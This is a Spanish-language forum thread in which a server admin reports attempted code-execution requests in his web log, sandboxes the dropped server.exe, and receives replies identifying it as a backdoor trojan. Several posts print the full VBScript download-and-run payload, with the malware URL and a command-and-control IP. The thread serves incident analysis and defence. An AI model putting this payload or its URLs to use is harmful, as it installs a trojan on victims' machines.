elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Intentonas de colarme un malware en mi servidor web desde China
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Intentonas de colarme un malware en mi servidor web desde China  (Leído 3,621 veces)
warcry.


Desconectado Desconectado

Mensajes: 1.004


Ver Perfil
Intentonas de colarme un malware en mi servidor web desde China
« en: 12 Enero 2018, 19:26 pm »

bueno he tenido dos intentonas de ejecucion de codigo en el log del servidor

Código:
6:12:08 117.61.135.182:19339 Requested GET /?search=> Set Shell = CreateObject("Wscript.Shell")
> Post.Open "GET","http://yamanbeisi.com/server.exe",0
> Post.Send()
> Set aGet = CreateObject("ADODB.Stream")
> aGet.Mode = 3
> aGet.Type = 1
> aGet.Open()
> aGet.Write(Post.responseBody)
> aGet.SaveToFile "c:\server.exe",2
> wscript.sleep 1000
> Shell.Run ("c:\server.exe").}

esa de las 6:12 de la mañana y otra a las 7:17

en principio creo que no estoy infectado porque el antivirus cuando he hecho la descarga desde la web http://yamanbeisi.com/server.exe me lo detecta, por lo que no creo que se haya ejecutado.

también la segunda intentona supongo que seria porque la primera no ha cuajado.

desde el navegador no he conseguido repetir la secuencia de comandos, ya que lo mas que he conseguido me la muestra el log asi

Código:
9:14:34 192.168.0.10:50677 Requested GET /?search=> Set Shell = CreateObject("Wscript.Shell") > Post.Open "GET","http://yamanbeisi.com/server.exe",0 > Post.Send() > Set aGet = CreateObject("ADODB.Stream") > aGet.Mode = 3 > aGet.Type = 1 > aGet.Open() > aGet.Write(Post.responseBody) > aGet.SaveToFile "c:\server.exe",2 > wscript.sleep 1000

el log me lo muestra en una sola linea y en negro, mientras que las intentonas de china me las muestra en azul y con intros, con lo cual no se ahora mismo si mi servidor es vulnerable a que se pueda abrir una shell y ejecutar código.

en principio creo que no, pero estoy con la mosca.

cuando tenga un poco de tiempo intento una conexión desde una shell de linux

en definitiva, hasta que tenga tiempo de crear una sandbox y e intente ver que es lo que hace el "server.exe" que te descargas en la web china, a ver si hay un alma caritativa que analice el malware y si me pone exactamente que es lo que hace se lo agradecería, para ver si hay alguna conexión rara o proceso suplantado o lo que sea que haga y mirar que no se esta ejecutando en mi servidor

thanx


En línea

HE SIDO BANEADO --- UN PLACER ---- SALUDOS
engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: Intentonas de colarme un malware en mi servidor web desde China
« Respuesta #1 en: 12 Enero 2018, 20:25 pm »

Código:
Set Shell = CreateObject("Wscript.Shell")
> Post.Open "GET","http://yamanbeisi.com/server.exe",0
> Post.Send()
> Set aGet = CreateObject("ADODB.Stream")
> aGet.Mode = 3
> aGet.Type = 1
> aGet.Open()
> aGet.Write(Post.responseBody)
> aGet.SaveToFile "c:\server.exe",2
> wscript.sleep 1000
> Shell.Run ("c:\server.exe").}

no se como es el lio de los server en windows, pero parece querer explotar algo como fue shellshock en linux, una cadena mal parseada, o en hecho puede que intente explotar algún analizador de logs o similar esperando que ejecute al parsear

tampoco se como se protege, pero un fail2ban de linux tiras que no se use "wscript" en un acceso y permaban
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
warcry.


Desconectado Desconectado

Mensajes: 1.004


Ver Perfil
Re: Intentonas de colarme un malware en mi servidor web desde China
« Respuesta #2 en: 12 Enero 2018, 21:02 pm »


no se como es el lio de los server en windows, pero parece querer explotar algo como fue shellshock en linux, una cadena mal parseada, o en hecho puede que intente explotar algún analizador de logs o similar esperando que ejecute al parsear

tampoco se como se protege, pero un fail2ban de linux tiras que no se use "wscript" en un acceso y permaban

en principio no tengo habilitada la opcion de ejecucion de scripts en el servidor, luego en teoria no deberia poder ejecutarse el "Wscript.Shell"

a parte he baneado todo el rango de ips del atacante 117.60.0.0 - 117.63.255.255

pero siempre te quedas con la mosca detrás de la oreja, por eso quería saber que hace exactamente el server.exe.

a ver si mañana por la mañana me pongo un rato y creo una sandbox.

esta noche si recibís desde mi ip ataques, recordad que igual soy un zombie, no soy yo  ;D
En línea

HE SIDO BANEADO --- UN PLACER ---- SALUDOS
warcry.


Desconectado Desconectado

Mensajes: 1.004


Ver Perfil
Re: Intentonas de colarme un malware en mi servidor web desde China
« Respuesta #3 en: 13 Enero 2018, 13:14 pm »

Bueno, hoy he estado haciendo mis pruebas.

he creado una sandbox y he ejecutado el archivo malicioso "server.exe" desde la ubicación teórica de descarga
Código:
Shell.Run ("c:\server.exe")

teniendo en cuenta que no soy ningun experto en analisis de malware, mis impresiones generales son:

1. El archivo al ejecutarse permanece en el directorio, en este caso C: luego no se esconde.

2. El proceso se para facilmente desde el administrador de tareas luego no es pegajoso

3. Abre una conexion a la ip 202.124.205.33

Código:
server.exe 4244 TCP 192.168.226.132 49936 202.124.205.33 6380 SYN_SENT

4. Los datos de esa ip son:

Código:
Dirección IP: 202.124.205.33
AS Number (ASN): AS17553 Bogor Agricultural University
Organización: Bogor Agricultural University
Dominio:
DNS: 202.124.205.33
Pais: Indonesia
Código País: id
Bandera: Click para ver la bandera en grande
Nombre Región: Jawa Barat
País Original: Indonesia
Ciudad: Bekasi
Código ZIP: 17148
Diferencia Horaria: +07:00
Ips vinculadas: 202.124.205.33

El ataque provenía de una ip china, luego ese servidor de una universidad indonesia, podría ser un server comprometido y manejado por los chinos, para que directamente el troyano no les apunte a ellos.

En definitiva, a priori el ataque no ha tenido éxito, lo que no he conseguido reproducir es el log en mi servidor, lo que me tiene un poco mosca pero bueno. Creo que es un ataque que explota malas configuraciones de apache sobre windows server.

si algún experto se digna a analizar el bicho y aporta mas detalles se lo agradecería, parece un troyano en toda regla, pero como digo no soy conocedor del mundo del malware




En línea

HE SIDO BANEADO --- UN PLACER ---- SALUDOS
AXCESS

Desconectado Desconectado

Mensajes: 179



Ver Perfil
Re: Intentonas de colarme un malware en mi servidor web desde China
« Respuesta #4 en: 19 Febrero 2018, 23:52 pm »

Lamento si la información no le es útil (como el post es viejito).
No soy especialista u experto en virus (como solicita), pero sentí curiosidad e hice una investigación ligera. Esto fue lo que hallé:
Está en lo cierto es un Troyano  y básicamente lo que hace es generar puertas traseras para filtración / espionaje de información de manera cifrada.
Tiene otros nombres y variantes (familia).
Como corren tiempos escépticos, aquí le dejo los Link:

https://www.reasoncoresecurity.com/server.exe-8b21b109244582d1a0303506aad69e1330cafe79.aspx

“The executable server.exe has been detected as malware named Worm.Autorun.Spy.Agent.”
“What does it do? Communicates with a remote host with strong encryption”
“Analysis date: 2/19/2018 9:36:51 PM UTC  (today)”

Corroborando funcionalidad.

https://www.superantispyware.com/malwarefiles/SERVER.EXE.html

“SERVER.EXE
Trojan.Agent/Gen-Backdoor”
"Trojan that may log user information and possibly block access to certain security related sites."

Hermano gemelo (puede tener el mismo nombre o su alternativo) (es un poco antigüa la información: ver):

https://greatis.com/blog/how-to/remove-server-runhosts-exe.htm

“SERVER\RUNHOSTS.EXE could also infect your computer by exploiting a security vulnerability of your Web browser or one of its plugins.
If this is the case, SERVER\RUNHOSTS.EXE would be injected into a Web page, and could get to your PC when you visited a malicious or hacked Web site.”

Hubo otras fuentes, pero me parecen redundantes y ociosas.
Una vez más, lamento si le llega tarde o no le es útil la información.
Buenos deseos.

« Última modificación: 20 Febrero 2018, 17:44 pm por AXCESS » En línea

warcry.


Desconectado Desconectado

Mensajes: 1.004


Ver Perfil
Re: Intentonas de colarme un malware en mi servidor web desde China
« Respuesta #5 en: 20 Febrero 2018, 16:36 pm »

gracias.

aunque la información que facilitas ya la tenia. pero te agradezco la ayuda

un saludo
En línea

HE SIDO BANEADO --- UN PLACER ---- SALUDOS
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
China produce y aloja una tercera parte del malware mundial
Noticias
wolfbcn 0 1,863 Último mensaje 21 Junio 2011, 15:22 pm
por wolfbcn
POR FAVOR AYUDA DESDE CHINA « 1 2 3 »
Dudas Generales
HONEY77 23 10,978 Último mensaje 26 Enero 2012, 08:56 am
por BlackZeroX
Acceder al servidor web via FTP desde un servidor virtual dedicado
Redes
Nucleorion 0 2,059 Último mensaje 21 Agosto 2013, 20:13 pm
por Nucleorion
Ataques DDoS desde China
Seguridad
@Zaηυт Sєc 1 1,940 Último mensaje 8 Marzo 2015, 19:49 pm
por engel lex
C# - Leer paquetes que son enviados desde un cliente a un servidor desde otro cl
.NET (C#, VB.NET, ASP)
TickTack 1 2,335 Último mensaje 26 Agosto 2017, 15:09 pm
por Rekt
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines